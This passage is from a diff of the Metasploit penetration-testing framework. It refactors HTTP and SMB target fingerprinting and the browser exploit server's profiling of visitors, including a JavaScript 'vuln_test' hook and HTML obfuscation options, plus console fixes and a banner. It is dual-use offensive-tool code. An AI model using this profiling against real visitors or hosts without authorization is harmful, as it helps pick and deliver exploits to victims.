# @option opts [Boolean] :full (false) Request the full HTTP fingerprint, not
# just the signature
#
# @return [String]
def http_fingerprint(opts={})
res = nil
uri = opts[:uri] || '/'
method = opts[:method] || 'GET'
if (opts[:response])
# Short-circuit the fingerprint lookup and HTTP request if a response has
# already been provided by the caller.
if opts[:response]
res = opts[:response]
else
# Check to see if we already have a fingerprint before going out to
# the network.
if (framework.db.active)
::ActiveRecord::Base.connection_pool.with_connection {
wspace = framework.db.workspace
if datastore['WORKSPACE']
wspace = framework.db.find_workspace(datastore['WORKSPACE'])
end
fprints = lookup_http_fingerprints(opts)
s = framework.db.get_service(wspace, rhost, 'tcp', rport)
if (s and s.info)
return s.info
end
}
if fprints.length > 0
# Grab the most recent fingerprint available for this service, uri, and method
fprint = fprints.last
# Return the full HTTP fingerprint if requested by the caller
return fprint if opts[:full]
# Otherwise just return the signature string for compatibility
return fprint[:signature]
end
# Go ahead and send a request to the target for fingerprinting
connect(opts)
uri = opts[:uri] || '/'
method = opts[:method] || 'GET'
res = send_request_raw(
{
'uri' => uri,
@ -481,11 +526,13 @@ module Exploit::Remote::HttpClient
})
end
# Bail if we don't have anything to fingerprint
# Bail if the request did not receive a readable response
return if not res
# From here to the end simply does some pre-canned combining and custom matches
# to build a human-readable string to store in service.info
# This section handles a few simple cases of pattern matching and service
# classification. This logic should be deprecated in favor of Recog-based
# fingerprint databases, but has been left in place for backward compat.
extras = []
if res.headers['Set-Cookie'] =~ /^vmware_soap_session/
@ -537,6 +584,11 @@ module Exploit::Remote::HttpClient
end
end
#
# This HTTP response code tracking is used by a few modules and the MSP logic
# to identify and bruteforce certain types of servers. In the long run we
# should deprecate this and use the http.fingerprint fields instead.
#
case res.code
when 301,302
extras << "#{res.code}-#{res.headers['Location']}"
@ -548,12 +600,51 @@ module Exploit::Remote::HttpClient
extras << "#{res.code}-#{res.message}"
end
info = "#{res.headers['Server']}"
# Build a human-readable string to store in service.info and http.fingerprint[:signature]
info = res.headers['Server'].to_s.dup
info << " ( #{extras.join(", ")} )" if extras.length > 0
# Create a new fingerprint structure to track this response
fprint = {
:uri => uri, :method => method,
:code => res.code.to_s, :message => res.message.to_s,
:signature => info
}
res.headers.each_pair do |k,v|
hname = k.to_s.downcase.gsub('-', '_').gsub(/[^a-z0-9_]+/, '')
next unless hname.length > 0
# Set-Cookie > :header_set_cookie => JSESSIONID=AAASD23423452
# Server > :header_server => Apache/1.3.37
# WWW-Authenticate > :header_www_authenticate => basic realm='www'
fprint["header_#{hname}".intern] = v
end
# Store the first 64k of the HTTP body as well
fprint[:content] = res.body.to_s[0,65535]
# Report a new http.fingerprint note
report_note(
:host => rhost,
:port => rport,
:proto => 'tcp',
:ntype => 'http.fingerprint',
:data => fprint,
# Limit reporting to one stored note per host/service combination
:update => :unique
)
# Report here even if info is empty since the fact that we didn't
# return early means we at least got a connection and the service is up
report_web_site(:host => rhost, :port => rport, :ssl => ssl, :vhost => vhost, :info => info.dup)
info
# Return the full HTTP fingerprint if requested by the caller
return fprint if opts[:full]
# Otherwise just return the signature string for compatibility
fprint[:signature]
end
def make_cnonce

87
lib/msf/core/exploit/http/server.rb
View File

@ -258,18 +258,19 @@ module Exploit::Remote::HttpServer
# Report#report_client, and Msf::DBManager#report_host namely:
# +:ua_name+:: a brief identifier for the client, e.g. "Firefox"
# +:ua_ver+:: the version number of the client, e.g. "3.0.11"
# +:os_name+:: one of the Msf::OperatingSystems constants
# +:os_flavor+:: something like "XP" or "Gentoo"
# +:os_name+:: something like "Windows XP", "Windows 7", or "Linux"
# +:os_flavor+:: something like "Enterprise", "Pro", or "Home"
# +:os_lang+:: something like "English", "French", or "en-US"
# +:arch+:: one of the ARCH_* constants
#
# Unknown values may be nil.
#
def fingerprint_user_agent(ua_str)
fp = { :ua_string => ua_str }
# always check for IE last because everybody tries to
# look like IE
# Guess the browser type based on the user agent
# Check for IE last since its often impersonated
case (ua_str.downcase)
# Chrome tries to look like Safari, so check it first
when /chrome\/(\d+(:?\.\d+)*)/
@ -292,58 +293,70 @@ module Exploit::Remote::HttpServer
else
fp[:ua_name] = HttpClients::UNKNOWN
end
# Guess the language
case (ua_str.downcase)
when /(en-us|en-gb)/
fp[:os_lang] = $1
end
# Guess the general OS type
case (ua_str.downcase)
when /windows/
when /windows|win32/
fp[:os_name] = OperatingSystems::WINDOWS
fp[:arch] = ARCH_X86
when /linux/
fp[:os_name] = OperatingSystems::LINUX
when /iphone/
fp[:os_name] = OperatingSystems::MAC_OSX
when /iphone|ipad/
fp[:os_name] = OperatingSystems::APPLE_IOS
fp[:arch] = 'armle'
when /mac os x/
fp[:os_name] = OperatingSystems::MAC_OSX
else
fp[:os_name] = OperatingSystems::UNKNOWN
end
# Determine the specific OS variant
# Note that we assume windows variants are the
# client version and mismatch server editions.
case (ua_str.downcase)
when /windows 95/
fp[:os_flavor] = '95'
fp[:os_name] = 'Windows 95'
when /windows 98/
fp[:os_flavor] = '98'
fp[:os_name] = 'Windows 98'
when /windows nt 4/
fp[:os_flavor] = 'NT'
fp[:os_name] = 'Windows NT'
when /windows nt 5.0/
fp[:os_flavor] = '2000'
fp[:os_name] = 'Windows 2000'
when /windows nt 5.1/
fp[:os_flavor] = 'XP'
fp[:os_name] = 'Windows XP'
when /windows nt 5.2/
fp[:os_flavor] = '2003'
fp[:os_name] = 'Windows 2003'
when /windows nt 6.0/
fp[:os_flavor] = 'Vista'
fp[:os_name] = 'Windows Vista'
when /windows nt 6.1/
fp[:os_flavor] = '7'
fp[:os_name] = 'Windows 7'
when /windows nt 6.2/
fp[:os_flavor] = '8'
fp[:os_name] = 'Windows 8'
when /windows nt 6.3/
fp[:os_name] = 'Windows 8.1'
when /gentoo/
fp[:os_flavor] = 'Gentoo'
fp[:os_vendor] = 'Gentoo'
when /debian/
fp[:os_flavor] = 'Debian'
fp[:os_vendor] = 'Debian'
when /ubuntu/
fp[:os_flavor] = 'Ubuntu'
fp[:os_vendor] = 'Ubuntu'
when /fedora/
fp[:os_flavor] = 'Fedora'
fp[:os_vendor] = 'Fedora'
when /red hat|rhel/
fp[:os_flavor] = 'RHEL'
fp[:os_vendor] = 'RHEL'
when /android/
fp[:os_flavor] = 'Android'
else
fp[:os_flavor] = ''
fp[:os_name] = OperatingSystems::ANDROID
end
# Guess the architecture
case (ua_str.downcase)
when /ppc/
fp[:arch] = ARCH_PPC
@ -676,6 +689,16 @@ module Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::HttpServer
UTF_NONE = 'none'
UTF_7 = 'utf-7'
UTF_7_ALL = 'utf-7-all'
UTF_8 = 'utf-8'
UTF_16_LE = 'utf-16le'
UTF_16_BE = 'utf-16be'
UTF_16_BE_MARKER = 'utf-16be-marker'
UTF_32_LE = 'utf-32le'
UTF_32_BE = 'utf-32be'
protected
def initialize(info = {})
@ -687,7 +710,7 @@ protected
# most browsers. as such, they are not added by default. The
# mixin supports encoding using them, however they are not
# listed in the Option.
OptEnum.new('HTML::unicode', [false, 'Enable HTTP obfuscation via unicode', 'none', ['none', 'utf-16le', 'utf-16be', 'utf-16be-marker', 'utf-32le', 'utf-32be']]),
OptEnum.new('HTML::unicode', [false, 'Enable HTTP obfuscation via unicode', UTF_NONE, [UTF_NONE, UTF_16_LE, UTF_16_BE, UTF_16_BE_MARKER, UTF_32_LE, UTF_32_BE]]),
OptEnum.new('HTML::base64', [false, 'Enable HTML obfuscation via an embeded base64 html object (IE not supported)', 'none', ['none', 'plain', 'single_pad', 'double_pad', 'random_space_injection']]),
OptInt.new('HTML::javascript::escape', [false, 'Enable HTML obfuscation via HTML escaping (number of iterations)', 0]),
], Exploit::Remote::HttpServer::HTML)
@ -881,19 +904,19 @@ protected
}
end
if ['utf-16le','utf-16be','utf32-le','utf32-be','utf-7','utf-8'].include?(datastore['HTML::unicode'])
if [UTF_16_LE, UTF_16_BE, UTF_32_LE, UTF_32_BE, UTF_7, UTF_8].include?(datastore['HTML::unicode'])
headers['Content-Type'] = 'text/html; charset= ' + datastore['HTML::unicode']
body = Rex::Text.to_unicode(body, datastore['HTML::unicode'])
else
# special cases
case datastore['HTML::unicode']
when 'utf-16be-marker'
when UTF_16_BE_MARKER
headers['Content-Type'] = 'text/html'
body = "\xFE\xFF" + Rex::Text.to_unicode(body, 'utf-16be')
when 'utf-7-all'
headers['Content-Type'] = 'text/html; charset=utf-7'
body = Rex::Text.to_unicode(body, 'utf-7', 'all')
when 'none'
body = "\xFE\xFF" + Rex::Text.to_unicode(body, UTF_16_BE)
when UTF_7_ALL
headers['Content-Type'] = "text/html; charset=#{UTF_7}"
body = Rex::Text.to_unicode(body, UTF_7, 'all')
when UTF_NONE
# do nothing
else
raise RuntimeError, 'Invalid unicode. how did you get here?'

139
lib/msf/core/exploit/remote/browser_exploit_server.rb
View File

@ -3,6 +3,7 @@
require 'erb'
require 'cgi'
require 'date'
require 'set'
require 'rex/exploitation/js'
require 'msf/core/exploit/jsobfu'
@ -23,43 +24,46 @@ module Msf
# this must be static between runs, otherwise the older cookies will be ignored
DEFAULT_COOKIE_NAME = '__ua'
PROXY_REQUEST_HEADER_SET = Set.new(
%w{
CLIENT_IP
FORWARDED
FORWARDED_FOR
FORWARDED_FOR_IP
HTTP_CLIENT_IP
HTTP_FORWARDED
HTTP_FORWARDED_FOR
HTTP_FORWARDED_FOR_IP
HTTP_PROXY_CONNECTION
HTTP_VIA
HTTP_X_FORWARDED
HTTP_X_FORWARDED_FOR
VIA
X_FORWARDED
X_FORWARDED_FOR
})
PROXY_REQUEST_HEADER_SET = Set.new(%w{
CLIENT_IP
FORWARDED
FORWARDED_FOR
FORWARDED_FOR_IP
HTTP_CLIENT_IP
HTTP_FORWARDED
HTTP_FORWARDED_FOR
HTTP_FORWARDED_FOR_IP
HTTP_PROXY_CONNECTION
HTTP_VIA
HTTP_X_FORWARDED
HTTP_X_FORWARDED_FOR
VIA
X_FORWARDED
X_FORWARDED_FOR
})
# Requirements a browser module can define in either BrowserRequirements or in targets
REQUIREMENT_KEY_SET = {
:source => 'source', # Either 'script' or 'headers'
:ua_name => 'ua_name', # Example: MSIE
:ua_ver => 'ua_ver', # Example: 8.0, 9.0
:os_name => 'os_name', # Example: Microsoft Windows
:os_flavor => 'os_flavor', # Example: XP, 7
:language => 'language', # Example: en-us
:arch => 'arch', # Example: x86
:proxy => 'proxy', # 'true' or 'false'
:silverlight => 'silverlight', # 'true' or 'false'
:office => 'office', # Example: "2007", "2010"
:java => 'java', # Example: 1.6, 1.6.0.0
:clsid => 'clsid', # ActiveX clsid. Also requires the :method key
:method => 'method', # ActiveX method. Also requires the :clsid key
:mshtml_build => 'mshtml_build', # mshtml build. Example: "65535"
:flash => 'flash' # Example: "12.0" (chrome/ff) or "12.0.0.77" (IE)
}
REQUIREMENT_KEY_SET = Set.new([
:source, # Either 'script' or 'headers'
:ua_name, # Example: MSIE
:ua_ver, # Example: 8.0, 9.0
:os_name, # Example: Windows 7, Linux
:os_flavor, # Example: Home, Enterprise
:os_device, # Example: iPad, iPhone, etc
:os_vendor, # Example: Microsoft, Ubuntu, Apple, etc
:os_sp, # Example: SP2
:language, # Example: en-us
:arch, # Example: x86
:proxy, # 'true' or 'false'
:silverlight, # 'true' or 'false'
:office, # Example: "2007", "2010"
:java, # Example: 1.6, 1.6.0.0
:clsid, # ActiveX clsid. Also requires the :method key
:method, # ActiveX method. Also requires the :clsid key
:mshtml_build, # mshtml build. Example: "65535"
:flash, # Example: "12.0" (chrome/ff) or "12.0.0.77" (IE)
:vuln_test # Example: "if(window.MyComponentIsInstalled)return true;"
])
def initialize(info={})
super
@ -129,7 +133,7 @@ module Msf
# @return [Hash] A hash of requirements
#
def extract_requirements(reqs)
tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.has_key?(k.to_sym)}
tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.include?(k.to_sym)}
# Make sure keys are always symbols
Hash[tmp.map{|(k,v)| [k.to_sym,v]}]
end
@ -189,9 +193,12 @@ module Msf
# Special keys to ignore because the script registers this as [:activex] = true or false
next if k == :clsid or k == :method
vprint_debug("Comparing requirement: #{k}=#{v} vs k=#{profile[k.to_sym]}")
expected = k != :vuln_test ? v : 'true'
vprint_debug("Comparing requirement: #{k}=#{expected} vs #{k}=#{profile[k.to_sym]}")
if v.is_a? Regexp
if k == :vuln_test
bad_reqs << k unless profile[k.to_sym].to_s == 'true'
elsif v.is_a? Regexp
bad_reqs << k if profile[k.to_sym] !~ v
elsif v.is_a? Proc
bad_reqs << k unless v.call(profile[k.to_sym])
@ -207,8 +214,8 @@ module Msf
# Returns the target profile based on the tag. Each profile has the following structure:
# 'cookie_name' =>
# {
# :os_name => 'Windows',
# :os_flavor => 'something'
# :os_name => 'Windows 7',
# :os_flavor => 'Enterprise',
# ...... etc ......
# }
# A profile should at least have info about the following:
@ -216,8 +223,8 @@ module Msf
# should be more accurate in some scenarios like browser compatibility mode
# :ua_name : The name of the browser
# :ua_ver : The version of the browser
# :os_name : The name of the OS
# :os_flavor : The flavor of the OS (example: XP)
# :os_name : The name of the OS ("Windows XP")
# :os_flavor : The edition of the OS ("Home")
# :language : The system's language
# :arch : The system's arch
# :proxy : Indicates whether proxy is used
@ -361,7 +368,7 @@ module Msf
<%= js_os_detect %>
<%= js_ajax_post %>
<%= js_misc_addons_detect %>
<%= js_ie_addons_detect if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
<%= js_ie_addons_detect if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %>
function objToQuery(obj) {
var q = [];
@ -375,19 +382,22 @@ module Msf
window.onload = function() {
var osInfo = os_detect.getVersion();
var d = {
"<%=REQUIREMENT_KEY_SET[:os_name]%>" : osInfo.os_name,
"<%=REQUIREMENT_KEY_SET[:os_flavor]%>" : osInfo.os_flavor,
"<%=REQUIREMENT_KEY_SET[:ua_name]%>" : osInfo.ua_name,
"<%=REQUIREMENT_KEY_SET[:ua_ver]%>" : osInfo.ua_version,
"<%=REQUIREMENT_KEY_SET[:arch]%>" : osInfo.arch,
"<%=REQUIREMENT_KEY_SET[:java]%>" : misc_addons_detect.getJavaVersion(),
"<%=REQUIREMENT_KEY_SET[:silverlight]%>" : misc_addons_detect.hasSilverlight(),
"<%=REQUIREMENT_KEY_SET[:flash]%>" : misc_addons_detect.getFlashVersion()
"os_name" : osInfo.os_name,
"os_flavor" : osInfo.os_flavor,
"os_vendor" : osInfo.os_vendor,
"os_device" : osInfo.os_device,
"ua_name" : osInfo.ua_name,
"ua_ver" : osInfo.ua_version,
"arch" : osInfo.arch,
"java" : misc_addons_detect.getJavaVersion(),
"silverlight" : misc_addons_detect.hasSilverlight(),
"flash" : misc_addons_detect.getFlashVersion(),
"vuln_test" : <%= js_vuln_test %>
};
<% if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
d['<%=REQUIREMENT_KEY_SET[:office]%>'] = ie_addons_detect.getMsOfficeVersion();
d['<%=REQUIREMENT_KEY_SET[:mshtml_build]%>'] = ScriptEngineBuildVersion().toString();
<% if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %>
d['office'] = ie_addons_detect.getMsOfficeVersion();
d['mshtml_build'] = ScriptEngineBuildVersion().toString();
<%
clsid = @requirements[:clsid]
method = @requirements[:method]
@ -497,6 +507,12 @@ module Msf
method(:on_request_exploit).call(cli, request, profile)
else
print_warning("Exploit requirement(s) not met: #{bad_reqs * ', '}. For more info: http://r-7.co/PVbcgx")
if bad_reqs.include?(:vuln_test)
error_string = (self.module_info['BrowserRequirements'] || {})[:vuln_test_error]
if error_string.present?
print_warning(error_string)
end
end
send_not_found(cli)
end
end
@ -547,13 +563,24 @@ module Msf
arch = browser_info[:arch]
platform = browser_info[:os_name]
# Fix names for consisntecy so our API can find the right one
# Fix names for consistency so our API can find the right one
# Originally defined in lib/msf/core/constants.rb
platform = platform.gsub(/^Mac OS X$/, 'OSX')
platform = platform.gsub(/^Microsoft Windows$/, 'Windows')
platform = platform.gsub(/^Windows.*$/, 'Windows')
regenerate_payload(cli, platform, arch).encoded
end
# @return [String] custom Javascript to check if a vulnerability is present
def js_vuln_test
all_reqs = self.module_info['BrowserRequirements'] || {}
if all_reqs[:vuln_test].present?
code = all_reqs[:vuln_test] + ';return !!this.is_vuln;'
'Function(('+JSON.generate(:code => code)+').code)()'
else
'true'
end
end
end
end

131
lib/msf/core/exploit/smb.rb
View File

@ -329,93 +329,53 @@ module Exploit::Remote::SMB
fprint = {}
# Connect to the server if needed
if(not self.simple)
if not self.simple
connect()
smb_login()
end
fprint['native_os'] = smb_peer_os()
fprint['native_lm'] = smb_peer_lm()
# Leverage Recog for SMB native OS fingerprinting
fp_match = Recog::Nizer.match('smb.native_os', fprint['native_os']) || { }
os = fp_match['os.product'] || 'Unknown'
sp = fp_match['os.version'] || ''
os = 'Unknown'
sp = ''
case smb_peer_os()
when 'Windows NT 4.0'
os = 'Windows NT 4.0'
when 'Windows 5.0'
os = 'Windows 2000'
when 'Windows 5.1'
os = 'Windows XP'
when /Windows XP (\d+) Service Pack (\d+)/
os = 'Windows XP'
sp = 'Service Pack ' + $2
when /Windows Server 2003 (\d+)$/
os = 'Windows 2003'
sp = 'No Service Pack'
when /Windows Server 2003 (\d+) Service Pack (\d+)/
os = 'Windows 2003'
sp = 'Service Pack ' + $2
when /Windows Server 2003 R2 (\d+) Service Pack (\d+)/
os = 'Windows 2003 R2'
sp = 'Service Pack ' + $2
when /Windows Vista \(TM\) (\w+|\w+ \w+) (\d+) Service Pack (\d+)/
os = 'Windows Vista ' + $1
sp = 'Service Pack ' + $3
when /Windows Vista \(TM\) (\w+|\w+ \w+) (\d+)/
os = 'Windows Vista ' + $1
sp = '(Build ' + $2 + ')'
when /Windows Server \(R\) 2008 (([\-\w]+ ){1,4})(\d+) Service Pack (\d+)/
os = 'Windows 2008 ' + $1.strip
sp = 'Service Pack ' + $4
when /Windows Server \(R\) 2008 (([\-\w]+ ){1,4})(\d+)/
os = 'Windows 2008 ' + $1.strip
sp = '(Build ' + $3 + ')'
when /Windows \(R\) Storage Server 2008 (([\-\w]+ ){1,4})(\d+) Service Pack (\d+)/
os = 'Windows 2008 Storage Server ' + $1.strip
sp = 'Service Pack ' + $4
when /Windows \(R\) Storage Server 2008 (([\-\w]+ ){1,4})(\d+)/
os = 'Windows 2008 Storage Server ' + $1.strip
sp = '(Build ' + $3 + ')'
when /Windows 7 (([\-\w]+ ){1,4})(\d+)/
os = 'Windows 7 ' + $1.strip
sp = '(Build ' + $3 + ')'
when /^(Windows.*) Service Pack (\d+)/
os = $1.strip
sp = 'Service Pack ' + $2
when /^(Windows.*) (\d+)/
os = $1.strip
sp = '(Build ' + $2 + ')'
when 'VxWorks'
os = 'VxWorks'
sp = smb_peer_lm()
when 'Unix'
os = 'Unix'
sv = smb_peer_lm()
case sv
when /Samba\s+(.*)/i
sp = 'Samba ' + $1
end
# Metasploit prefers 'Windows 2003' vs 'Windows Server 2003'
if os =~ /^Windows Server/
os = os.sub(/^Windows Server/, 'Windows')
end
if fp_match['os.edition']
fprint['edition'] = fp_match['os.edition']
end
if (os == 'Windows XP' and sp.length == 0)
if fp_match['os.build']
fprint['build'] = fp_match['os.build']
end
if sp == ''
sp = smb_fingerprint_windows_sp(os)
end
lang = smb_fingerprint_windows_lang
fprint['os'] = os
fprint['sp'] = sp
fprint['lang'] = lang
fprint
end
#
# Determine the service pack level of a Windows system via SMB probes
#
def smb_fingerprint_windows_sp(os)
sp = ''
if (os == 'Windows XP')
# SRVSVC was blocked in SP2
begin
smb_create("\\SRVSVC")
@ -509,8 +469,16 @@ module Exploit::Remote::SMB
rescue ::Exception
end
end
sp
end
#
# Determine the native language pack of a Windows system via SMB probes
#
def smb_fingerprint_windows_lang
#
# Remote language detection via Print Providers
# Credit: http://immunityinc.com/downloads/Remote_Language_Detection_in_Immunity_CANVAS.odt
@ -663,12 +631,7 @@ module Exploit::Remote::SMB
raise $!
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
end
fprint['os'] = os
fprint['sp'] = sp
fprint['lang'] = lang
fprint
lang
end
# @return [Rex::Proto::SMB::SimpleClient]

2
lib/msf/core/handler/reverse_tcp.rb
View File

@ -70,7 +70,7 @@ module ReverseTcp
#
def setup_handler
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
raise RuntimeError, "TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour."
end
ex = false

18
lib/msf/core/module/reference.rb
View File

@ -93,21 +93,23 @@ class Msf::Module::SiteReference < Msf::Module::Reference
self.ctx_val = in_ctx_val
if (in_ctx_id == 'OSVDB')
self.site = 'http://www.osvdb.org/' + in_ctx_val.to_s
self.site = "http://www.osvdb.org/#{in_ctx_val}"
elsif (in_ctx_id == 'CVE')
self.site = "http://cvedetails.com/cve/#{in_ctx_val.to_s}/"
self.site = "http://cvedetails.com/cve/#{in_ctx_val}/"
elsif (in_ctx_id == 'CWE')
self.site = "http://cwe.mitre.org/data/definitions/#{in_ctx_val.to_s}.html"
self.site = "http://cwe.mitre.org/data/definitions/#{in_ctx_val}.html"
elsif (in_ctx_id == 'BID')
self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
self.site = "http://www.securityfocus.com/bid/#{in_ctx_val}"
elsif (in_ctx_id == 'MSB')
self.site = 'http://technet.microsoft.com/en-us/security/bulletin/' + in_ctx_val.to_s
self.site = "http://technet.microsoft.com/en-us/security/bulletin/#{in_ctx_val}"
elsif (in_ctx_id == 'EDB')
self.site = 'http://www.exploit-db.com/exploits/' + in_ctx_val.to_s
self.site = "http://www.exploit-db.com/exploits/#{in_ctx_val}"
elsif (in_ctx_id == 'US-CERT-VU')
self.site = 'http://www.kb.cert.org/vuls/id/' + in_ctx_val.to_s
self.site = "http://www.kb.cert.org/vuls/id/#{in_ctx_val}"
elsif (in_ctx_id == 'ZDI')
self.site = 'http://www.zerodayinitiative.com/advisories/ZDI-' + in_ctx_val.to_s
self.site = "http://www.zerodayinitiative.com/advisories/ZDI-#{in_ctx_val}"
elsif (in_ctx_id == 'WPVDB')
self.site = "https://wpvulndb.com/vulnerabilities/#{in_ctx_val}"
elsif (in_ctx_id == 'URL')
self.site = in_ctx_val.to_s
else

8
lib/msf/core/post/common.rb
View File

@ -111,7 +111,13 @@ module Msf::Post::Common
o << d
end
o.chomp! if o
process.channel.close
begin
process.channel.close
rescue IOError => e
# Channel was already closed, but we got the cmd output, so let's soldier on.
end
process.close
when /shell/
o = session.shell_command_token("#{cmd} #{args}", time_out)

1
lib/msf/ui/banner.rb
View File

@ -24,6 +24,7 @@ module Banner
wake-up-neo.txt
workflow.txt
3kom-superhack.txt
metasploit-park.txt
}
#

22
lib/msf/ui/console/command_dispatcher/core.rb
View File

@ -2009,7 +2009,7 @@ class Core
res << 'ENCODER'
end
if (mod.auxiliary?)
if mod.kind_of?(Msf::Module::HasActions)
res << "ACTION"
end
@ -2149,10 +2149,10 @@ class Core
print_error("No exploit module selected.")
end
when "actions"
if (mod and (mod.auxiliary? or mod.post?))
if mod && mod.kind_of?(Msf::Module::HasActions)
show_actions(mod)
else
print_error("No auxiliary module selected.")
print_error("No module with actions selected.")
end
else
@ -2721,8 +2721,8 @@ class Core
return option_values_encoders() if opt.upcase == 'StageEncoder'
end
# Well-known option names specific to auxiliaries
if (mod.auxiliary?)
# Well-known option names specific to modules with actions
if mod.kind_of?(Msf::Module::HasActions)
return option_values_actions() if opt.upcase == 'ACTION'
end
@ -2869,7 +2869,7 @@ class Core
#
# Provide valid action options for the current auxiliary module
# Provide valid action options for the current module
#
def option_values_actions
res = []
@ -3146,6 +3146,12 @@ class Core
print("\nExploit target:\n\n#{mod_targ}\n") if (mod_targ and mod_targ.length > 0)
end
# Print the selected action
if mod.kind_of?(Msf::Module::HasActions) && mod.action
mod_action = Serializer::ReadableText.dump_module_action(mod, ' ')
print("\n#{mod.type.capitalize} action:\n\n#{mod_action}\n") if (mod_action and mod_action.length > 0)
end
# Uncomment this line if u want target like msf2 format
#print("\nTarget: #{mod.target.name}\n\n")
end
@ -3202,8 +3208,8 @@ class Core
end
def show_actions(mod) # :nodoc:
mod_actions = Serializer::ReadableText.dump_auxiliary_actions(mod, ' ')
print("\nAuxiliary actions:\n\n#{mod_actions}\n") if (mod_actions and mod_actions.length > 0)
mod_actions = Serializer::ReadableText.dump_module_actions(mod, ' ')
print("\n#{mod.type.capitalize} actions:\n\n#{mod_actions}\n") if (mod_actions and mod_actions.length > 0)
end
def show_advanced_options(mod) # :nodoc:

28
lib/msf/ui/console/module_command_dispatcher.rb
View File

@ -125,13 +125,12 @@ module ModuleCommandDispatcher
defanged?
ip_range_arg = args.shift || mod.datastore['RHOSTS'] || framework.datastore['RHOSTS'] || ''
hosts = Rex::Socket::RangeWalker.new(ip_range_arg)
opt = Msf::OptAddressRange.new('RHOSTS')
begin
if hosts.ranges.blank?
# Check a single rhost
check_simple
else
if !ip_range_arg.blank? && opt.valid?(ip_range_arg)
hosts = Rex::Socket::RangeWalker.new(opt.normalize(ip_range_arg))
# Check multiple hosts
last_rhost_opt = mod.rhost
last_rhosts_opt = mod.datastore['RHOSTS']
@ -144,7 +143,14 @@ module ModuleCommandDispatcher
mod.datastore['RHOSTS'] = last_rhosts_opt
mod.cleanup
end
else
# Check a single rhost
unless Msf::OptAddress.new('RHOST').valid?(mod.datastore['RHOST'])
raise Msf::OptionValidateError.new(['RHOST'])
end
check_simple
end
rescue ::Interrupt
# When the user sends interrupt trying to quit the task, some threads will still be active.
# This means even though the console tells the user the task has aborted (or at least they
@ -182,16 +188,22 @@ module ModuleCommandDispatcher
print_status("#{peer} - #{code[1]}")
end
else
print_error("#{peer} - Check failed: The state could not be determined.")
msg = "#{peer} - Check failed: The state could not be determined."
print_error(msg)
elog("#{msg}\n#{caller.join("\n")}")
end
rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error
rescue ::Rex::ConnectionError, ::Rex::ConnectionProxyError, ::Errno::ECONNRESET, ::Errno::EINTR, ::Rex::TimeoutError, ::Timeout::Error => e
# Connection issues while running check should be handled by the module
rescue ::RuntimeError
elog("#{e.message}\n#{e.backtrace.join("\n")}")
rescue ::RuntimeError => e
# Some modules raise RuntimeError but we don't necessarily care about those when we run check()
elog("#{e.message}\n#{e.backtrace.join("\n")}")
rescue Msf::OptionValidateError => e
print_error("Check failed: #{e.message}")
elog("#{e.message}\n#{e.backtrace.join("\n")}")
rescue ::Exception => e
print_error("#{peer} - Check failed: #{e.class} #{e}")
elog("#{e.message}\n#{e.backtrace.join("\n")}")
end
end

17
lib/msf/ui/logos/metasploit-park.txt Normal file
View File

@ -0,0 +1,17 @@
%clr%whi
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> %bldaccess security%clr
access: PERMISSION DENIED.
> %bldaccess security grid%clr
access: PERMISSION DENIED.
> %bldaccess main security grid%clr
access: PERMISSION DENIED....and...
%redYOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!%clr

6
lib/rex/exploitation/js/detect.rb
View File

@ -15,10 +15,12 @@ class Detect
# Provides several javascript functions for determining the OS and browser versions of a client.
#
# getVersion(): returns an object with the following properties
# os_name - OS name, one of the Msf::OperatingSystems constants
# os_flavor - OS flavor as a string (e.g.: "XP", "2000")
# os_name - OS name such as "Windows 8", "Linux", "Mac OS X"
# os_flavor - OS flavor as a string such as "Home", "Enterprise", etc
# os_sp - OS service pack (e.g.: "SP2", will be empty on non-Windows)
# os_lang - OS language (e.g.: "en-us")
# os_vendor - A company or organization name such as Microsoft, Ubuntu, Apple, etc
# os_device - A specific piece of hardware such as iPad, iPhone, etc
# ua_name - Client name, one of the Msf::HttpClients constants
# ua_version - Client version as a string (e.g.: "3.5.1", "6.0;SP2")
# arch - Architecture, one of the ARCH_* constants

8
lib/rex/image_source/image_source.rb
View File

@ -29,8 +29,12 @@ class ImageSource
# FIXME, make me better
string = ''
loop do
char = read(offset, 1)
break if char == "\x00"
begin
char = read(offset, 1)
rescue RangeError
break
end
break if char.nil? || char == "\x00"
offset += 1
string << char
end

2
lib/rex/parser/nexpose_raw_nokogiri.rb
View File

@ -504,7 +504,7 @@ module Rex
}
}
note[:data][:vendor] = @report_data[:os]["os_vendor"] if @report_data[:os]["os_vendor"]
note[:data][:product] = @report_data[:os]["os_product"] if @report_data[:os]["os_prduct"]
note[:data][:product] = @report_data[:os]["os_product"] if @report_data[:os]["os_product"]
note[:data][:version] = @report_data[:os]["os_version"] if @report_data[:os]["os_version"]
note[:data][:arch] = @report_data[:os]["os_arch"] if @report_data[:os]["os_arch"]
db_report(:note, note)

2
lib/rex/proto/http/handler/proc.rb
View File

@ -36,7 +36,7 @@ class Handler::Proc < Handler
def on_request(cli, req)
begin
procedure.call(cli, req)
rescue Errno::EPIPE
rescue Errno::EPIPE, ::Errno::ECONNRESET, ::Errno::ENOTCONN, ::Errno::ECONNABORTED
elog("Proc::on_request: Client closed connection prematurely", LogSource)
rescue
elog("Proc::on_request: #{$!.class}: #{$!}\n\n#{$@.join("\n")}", LogSource)

3
lib/snmp/manager.rb
View File

@ -62,8 +62,9 @@ class RexUDPTransport
@socket.sendto(data, host, port, flags)
rescue NoMethodError
@socket.send(data, 0, host, port)
